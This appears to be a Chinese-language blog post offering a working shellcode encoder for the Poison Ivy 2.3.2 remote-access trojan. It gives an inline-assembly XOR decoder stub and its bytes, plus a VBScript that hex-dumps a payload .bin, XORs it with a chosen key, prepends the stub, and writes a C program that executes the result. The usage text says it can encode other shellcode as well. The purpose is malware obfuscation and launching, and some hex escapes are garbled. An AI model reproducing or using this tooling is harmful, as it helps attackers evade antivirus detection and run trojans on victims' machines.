
xor shellcode for Poison Ivy 2.3.2 bin

From vbs小铺blog

=======================================================================================================================
用c代码和汇编得到一个xor &h21 的解码头的示例代码
#include <string.h>
#include <stdio.h>

/*
 * Example program whose inline-asm block is the XOR decode stub: the 23 bytes
 * it assembles to are quoted right after this listing and reused verbatim by
 * the VBScript below, which patches only the key byte (0x21) and keeps the
 * hard-coded length 0x2134. Built as-is there is no payload after decode_ok,
 * so the loop would simply XOR whatever follows the asm block.
 */
int main()
{
      __asm
     {
               jmp     decode_end                   // jump forward so the call below pushes the address of the encoded buffer
decode_start:
        pop     edx                   // pop that return address: edx now points at the encoded buffer (decode_ok)
             dec     edx                   // edx = buffer - 1, so [edx+ecx] with ecx counting down covers bytes 0..len-1
               xor     ecx,ecx
               mov     cx,0x2134               // length to decode: 0x2134 = 8500 bytes, assumed large enough for the payload
decode_loop:
              xor     byte ptr [edx+ecx], 0x21   // the encoder used key 0x21, so decoding uses the same byte
             loop     decode_loop                   // ecx is decremented and the loop repeats until it reaches zero
               jmp     decode_ok                       // decoding finished: jump to the decoded bytes and run them
decode_end:
        call     decode_start                 // pushes the address of decode_ok for the pop above
decode_ok:                                 // the encoded enShellCode is appended here
      }
     return 0;
}
od反汇编得到decode的解码头为:"xEBx10x5Ax4Ax33xC9x66xB9x34x21x80x34x0Ax21xE2xFAxEBx05xE8xEBxFFxFFxFF"
==============================================================================================================================


' Entry guards: refuse to run under the GUI host, and show usage when no
' arguments were given. Each branch terminates the script, so only the
' first matching case ever runs.
Select Case True
    Case LCase(Right(WScript.FullName, 11)) = "wscript.exe"
        WScript.Echo "Execute it under the cmd.exe Plz! Thx."
        WScript.Quit
    Case WScript.Arguments.Count = 0
        usage()
        WScript.Quit
End Select


10进制转16进制函数
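' Converts a non-negative integer (or a numeric string) to an upper-case
' hexadecimal string with no leading zeros.
'   Dec     - value to convert; strings such as "222" are accepted and
'             converted with CLng first.
' Returns "" for 0 and for negative values (the caller pads "" to "00").
Function Dec2Hex(Dec)
     Dim a
     Dec2Hex = ""
     ' Force a numeric type: VBScript orders a string above any number in
     ' comparisons, so "Dec > 0" on a string operand would always be True.
     Dec = CLng(Dec)
     Do While Dec > 0
         a = CStr(Dec Mod 16)
         Select Case a
             Case "10": a = "A"
             Case "11": a = "B"
             Case "12": a = "C"
             Case "13": a = "D"
             Case "14": a = "E"
             Case "15": a = "F"
         End Select
         Dec2Hex = a & Dec2Hex
         ' Integer division drops the nibble just emitted (the original
         ' "Dec = Dec 16" had lost its "\" operator and does not parse).
         Dec = Dec \ 16
     Loop
End Function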

读取二进制文件函数

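' Reads the file at sStr as raw bytes and returns its contents as an
' upper-case hex string, two characters per byte, no separators.
'   sStr - path of the file to read.
' Returns "" for an empty file. Raises the ADODB error if the file cannot
' be loaded.
Function ReadGif(sStr)
Dim i, iHex, sBytes, oStream
Set oStream = CreateObject("Adodb.Stream")
oStream.Type = 1                  ' 1 = adTypeBinary
oStream.Open
oStream.LoadFromFile sStr

' Read the whole file once. The original re-read the entire stream on
' every loop iteration (Position = 0 / Read()), which is quadratic in the
' file size.
sBytes = oStream.Read
oStream.Close
Set oStream = Nothing

ReadGif = ""
' Read returns Null for an empty stream; LenB(Null) would not make a valid
' loop bound.
If IsNull(sBytes) Then Exit Function

For i = 1 To LenB(sBytes)
     iHex = Hex(AscB(MidB(sBytes, i, 1)))
     If Len(iHex) = 1 Then iHex = "0" & iHex
     ReadGif = ReadGif & iHex
Next
End Function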

把代码分块输出函数
' Splits sSource into pieces of iLong characters (the last piece may be
' shorter) and joins them with sJoiner; no joiner is appended after the
' last piece.
'   sSource - string to split.
'   iLong   - piece length in characters (zero raises a division error,
'             as before).
'   sJoiner - separator placed between pieces.
' Returns "" when sSource is empty.
Function CutAndJoin(sSource, iLong, sJoiner)

Dim iChunks, iIdx, aParts()

' Number of pieces = ceiling(Len / iLong); -Int(-x) rounds x up.
iChunks = -Int(-(Len(sSource) / iLong))
If iChunks <= 0 Then
    CutAndJoin = ""
    Exit Function
End If

ReDim aParts(iChunks - 1)
For iIdx = 0 To iChunks - 1
    aParts(iIdx) = Mid(sSource, iIdx * iLong + 1, iLong)
Next

CutAndJoin = Join(aParts, sJoiner)

End Function


' --- Main: hex-dump arg(0), XOR every byte with the key arg(1), prepend the decoder stub ---
Set Arg=Wscript.Arguments

' Hex dump of arg(0) split into two-character bytes, each prefixed with "x".
' NOTE(review): the C string on the "od" line above reads "xEBx10..." too, so
' the "\" of every "\x" escape appears to have been lost in this copy of the page.
tempshellccode=CutAndJoin(ReadGif(arg(0)),2,"x")

' Element 0 is "" because the string starts with the joiner; the loop starts at 1.
shellcode=Split(tempshellccode,"x")


' XOR each byte with the key and re-encode it as two hex digits.
For i=1 To UBound(shellcode)
' "&" binds tighter than Xor; both "&h.." strings are coerced to numbers by Xor.
temp=(("&h"&shellcode(i)) Xor "&h"&arg(1))
temp=Dec2Hex(CStr(temp))
If Len(temp)=1 Then temp="0"&temp
If temp="" Then temp="00"          ' Dec2Hex returns "" for zero
vbshellcode=vbshellcode&"x"&temp
Next

' Fixed decoder stub (the asm above): only the key byte after "x34x0Ax" is taken
' from arg(1); the length 0x2134 stays hard-coded. NOTE(review): apart from that
' one byte the stub is constant, so it is a stable signature for this encoder.
decode="xEBx10x5Ax4Ax33xC9x66xB9x34x21x80x34x0Ax"&arg(1)&"xE2xFAxEBx05xE8xEBxFFxFFxFF"
decode=decode&LCase(vbshellcode)

WScript.Echo CutAndJoin(decode, 80, Chr(13)) ' 80 is a multiple of 4, so the rows line up nicely


' Writes a C source file at path cpp that embeds the script-level string
' "decode" as a char array and a main() that calls into it.
'   cpp - output path; the file is created or overwritten.
' Note: FSO is assigned without Dim and so becomes a script-level variable.
Function writef(cpp)
Set FSO = CreateObject("Scripting.FileSystemObject")
with fso.opentextfile(cpp,2,true)     ' 2 = ForWriting, True = create if missing
.writeline "#include<windows.h>"
    .writeline "char ShellCode[]="
' 80-character rows, each wrapped in double quotes (Chr(34)) and separated by CR.
.writeline Chr(34)&CutAndJoin(decode, 80, Chr(34)&Chr(13)&Chr(34))&Chr(34)&";"
.writeline "int main()"
    .writeline "{"
    .writeline " ( (void(*)(void)) &ShellCode)();"
    .writeline "return 0;"
    .writeline "}"
   .close
End with
Set fso = Nothing
End Function

writef(arg(2))   ' arg(2): path of the generated C file


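' Returns True when str names an existing file, otherwise False.
'   str - path to test.
Function Findfile(str)
Dim oFso
' Local object: the original assigned FSO without Dim, leaking it as a
' script-level variable that is never released.
Set oFso = CreateObject("Scripting.FileSystemObject")
Findfile = oFso.FileExists(str)
Set oFso = Nothing
End Function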


' Report success only if the output file now exists on disk.
If Findfile(arg(2)) Then wsh.echo "已生成"&arg(2)&"的c语言格式文件"


function usage()
wscript.echo "+--codz By lcx ^^ shellcode xor for Poison Ivy 2.3.2 vbscript-------+"
wscript.echo "|不只是针对Poison的bin文件进行变形,稍做改动可以xor其它的shellcode---+"
wscript.echo "|Useage:                                                            |"
wscript.echo "|       cscript.exe shellcode.vbs x.bin xorhexnum test.cpp          |"
wscript.echo "|ex:                                                                |"
wscript.echo "|       cscript.exe shellcode.vbs c:PoisonIvy.bin 21 c: est.c
